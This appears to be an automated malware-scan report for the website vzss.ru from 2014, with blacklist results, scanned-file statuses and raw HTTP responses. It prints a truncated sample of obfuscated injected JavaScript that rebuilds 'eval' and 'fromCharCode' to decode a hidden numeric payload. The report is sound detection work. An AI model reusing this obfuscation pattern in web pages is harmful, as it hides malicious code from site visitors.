Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vzss.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vzss.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://vzss.ru/ | 200 OK Content-Length: 3981 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) h=-parseInt('012')/5;if(window["document"])try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];f='fr'+'omCh';f+='arC';f+='qgode'["substr"](2);w=this;e=w[f["substr"](11)+zz];t='y';}n="19#50#57.5#54#48.5#57#51.5#54.5#54#19#19.5#15#60.5#5.5#4#3.5#58#47.5#56#15#57.5#56#53#15#29.5#15#18.5#51#57#57#55#28#22.5#22.5#52#25#47.5#56.5#53#24.5#23.5#22#54.5#47.5#54.5#58.5#49.5#58#56#52.5#49#53.5#22#47.5#57#21.5#48#47.5#54#49#21.5#48.5#47.5#53.5#55#22#54#49.5#57#22.5#50.5#22.5#18.5#28.5#5 Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://vzss.ru/js/jquery.maximage.js | 200 OK Content-Length: 43701 Content-Type: application/javascript | clean |
http://vzss.ru/test404page.js | 404 Not Found Content-Length: 5651 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vzss.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 10:07:39 GMT
Accept-Ranges: bytes
Age: 1
ETag: "1e204c4-f8d-4be34c2e1d700"
Server: Apache/2.2.25 (FreeBSD)
Content-Language: ru
Content-Length: 3981
Content-Type: text/html; charset=windows-1251
Last-Modified: Sat, 21 Apr 2012 18:42:04 GMT
X-Cache: HIT from t1.hoster.ru
X-Cache-Lookup: HIT from t1.hoster.ru:6666
...3981 bytes of data.
GET / HTTP/1.1
Host: vzss.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 10:07:39 GMT
Accept-Ranges: bytes
Age: 1
ETag: "1e204c4-f8d-4be34c2e1d700"
Server: Apache/2.2.25 (FreeBSD)
Content-Language: ru
Content-Length: 3981
Content-Type: text/html; charset=windows-1251
Last-Modified: Sat, 21 Apr 2012 18:42:04 GMT
X-Cache: HIT from t1.hoster.ru
X-Cache-Lookup: HIT from t1.hoster.ru:6666
...3981 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vzss.ru
Referer: http://www.google.com/search?q=vzss.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vzss.ru
Referer: http://www.google.com/search?q=vzss.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.